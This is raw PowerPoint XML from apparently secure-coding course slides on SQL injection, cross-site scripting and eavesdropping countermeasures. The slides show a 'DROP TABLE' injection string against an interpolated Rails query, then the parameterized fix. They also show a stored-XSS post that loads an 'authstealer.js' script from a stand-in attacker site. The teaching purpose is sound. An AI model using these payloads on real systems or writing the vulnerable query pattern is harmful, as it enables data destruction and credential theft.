            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1754188" y="1822450"/>
            <a:ext cx="931227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id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params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[:id]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# =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--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"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…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solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where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("name = '#{id}'")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What if…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28674" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1754188" y="1822450"/>
            <a:ext cx="931227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id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params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[:id]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# =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--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"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…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solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where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("name = '#{id}'")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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2352676" y="3638332"/>
            <a:ext cx="8313737" cy="3083143"/>
            <a:chOff x="830916" y="3638606"/>
            <a:chExt cx="8313084" cy="3082825"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28676" name="Pictur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8"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5784672" y="4353004"/>
              <a:ext cx="3359328" cy="2368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677" name="Group 8"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="830916" y="3638606"/>
              <a:ext cx="5549966" cy="2372468"/>
              <a:chOff x="830916" y="3638606"/>
              <a:chExt cx="5549966" cy="2372468"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28678" name="TextBox 3"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="830916" y="4626079"/>
                <a:ext cx="5549966" cy="1384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>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>SELECT * FROM students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>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>WHERE name = '</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>Robert';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b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>DROP TABLE students;--</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US">
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>';</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3875502" y="3638606"/>
                <a:ext cx="0" cy="987541"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="76200" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FF00F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How to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29698" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1754188" y="1822450"/>
            <a:ext cx="931227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id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params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[:id]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# =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--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"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…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solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where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("name = '#{id}'")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How to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1754188" y="1822450"/>
            <a:ext cx="931227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id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params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[:id]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# =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--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"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…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solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where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("name = '#{id}'")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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6527801" y="5285745"/>
            <a:ext cx="3106737" cy="1431925"/>
            <a:chOff x="5005966" y="4896772"/>
            <a:chExt cx="3105548" cy="1433198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5005966" y="4896772"/>
              <a:ext cx="315791" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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5256695" y="5025473"/>
              <a:ext cx="610953" cy="500508"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF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727" name="TextBox 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5705311" y="5375863"/>
              <a:ext cx="2406203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>
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Automatically </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" u="sng">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>escapes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> input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8DDBC9F-6232-CF4A-84F6-F6DD4D2AD77E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1769218" y="3356975"/>
            <a:ext cx="7150945" cy="1955756"/>
            <a:chOff x="246805" y="3356975"/>
            <a:chExt cx="7150945" cy="1955756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>
              <a:off x="259331" y="3595056"/>
              <a:ext cx="7138419" cy="1717675"/>
              <a:chOff x="259568" y="3206465"/>
              <a:chExt cx="7138137" cy="1718120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30728" name="TextBox 3"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="259568" y="4401365"/>
                <a:ext cx="713813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>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>Student.where("name = ?", id)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3602143" y="3206465"/>
                <a:ext cx="4762" cy="1216340"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="76200" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FF00F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731" name="TextBox 7"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3671044" y="3420888"/>
                <a:ext cx="232840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>
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Write like this!</a:t>
                </a:r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7D13B00-8107-9347-8B92-99B97665D3DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="246805" y="3356975"/>
              <a:ext cx="6742718" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="508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Translation becomes…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31746" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1754188" y="1822450"/>
            <a:ext cx="931227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id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params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[:id]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# =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--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"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…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solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = ?", id)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Translation becomes…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31746" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1754188" y="1822450"/>
            <a:ext cx="931227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id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params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[:id]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# =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--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"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…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solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = ?", id)</a:t>
            </a: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239962" y="3638331"/>
            <a:ext cx="7956550" cy="2457668"/>
            <a:chOff x="716760" y="3638603"/>
            <a:chExt cx="7956851" cy="2457397"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31748" name="Group 8"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="716760" y="3638603"/>
              <a:ext cx="6004217" cy="2372471"/>
              <a:chOff x="716760" y="3638603"/>
              <a:chExt cx="6004217" cy="2372471"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31750" name="TextBox 3"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="716760" y="4626079"/>
                <a:ext cx="6004217" cy="1384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>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>SELECT * FROM students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>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>WHERE name = '</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>Robert</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>;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b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>DROP TABLE students</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>;</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US">
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>';</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3874417" y="3638603"/>
                <a:ext cx="0" cy="987534"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="76200" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FF00F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749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4611" y="4318000"/>
              <a:ext cx="2159000" cy="177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3363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410134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>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Course</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Goals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32267"/>
            <a:ext cx="10276068" cy="2734868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618939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After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taking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this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course,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will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be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better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able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develop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Java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applications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by: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1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Knowing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applying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Principles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Coding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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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Having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better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understanding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causes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common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vulnerabilities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199" spc="-67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methods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preventing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them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9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Being able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recognize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opportunities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apply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coding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principles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717970" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Being able to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remediate security vulnerabilities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by applying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coding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principles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88578" y="6450406"/>
            <a:ext cx="83798" cy="151284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900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="9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08401" y="6410183"/>
            <a:ext cx="4575888" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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courtesty</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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of: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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://tweakyourbiz.com/growth/files/shutterstock-Goal-setting.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="1000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9622" y="4125286"/>
            <a:ext cx="2648021" cy="173386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Three Common Web App Attacks and Countermeasures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FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Eavesdropping on network communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Encrypt communications with SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Use escaped queries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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979612" y="0"/>
            <a:ext cx="8229600" cy="8255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Micropost Example: What if…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3379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29825" b="19022"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3748088" y="825500"/>
            <a:ext cx="6918325" cy="603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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979612" y="0"/>
            <a:ext cx="8229600" cy="8255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Micropost Example: What if…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3481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29825" b="19022"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3748088" y="825500"/>
            <a:ext cx="6918325" cy="603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extBox 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1819276" y="5337175"/>
            <a:ext cx="8389937" cy="95408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>
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blah blah…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script src="http://mallorysevilsite.com/authstealer.js"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2968625" y="3773489"/>
            <a:ext cx="2595562" cy="1557337"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2595686"/>
              <a:gd name="connsiteY0" fmla="*/ 1557477 h 1557477"/>
              <a:gd name="connsiteX1" fmla="*/ 954842 w 2595686"/>
              <a:gd name="connsiteY1" fmla="*/ 389369 h 1557477"/>
              <a:gd name="connsiteX2" fmla="*/ 2595686 w 2595686"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 155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5686" h="1557477">
                <a:moveTo>
                  <a:pt x="0" y="1557477"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="261114" y="1103212"/>
                  <a:pt x="522228" y="648948"/>
                  <a:pt x="954842" y="389369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1387456" y="129789"/>
                  <a:pt x="2309852" y="71075"/>
                  <a:pt x="2595686" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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821" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-2307342">
            <a:off x="2524125" y="3865564"/>
            <a:ext cx="17192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>
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User posts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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979612" y="0"/>
            <a:ext cx="8229600" cy="8255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Malicious script runs when feed loads!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3584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29825" b="19022"/>
          <a:stretch>
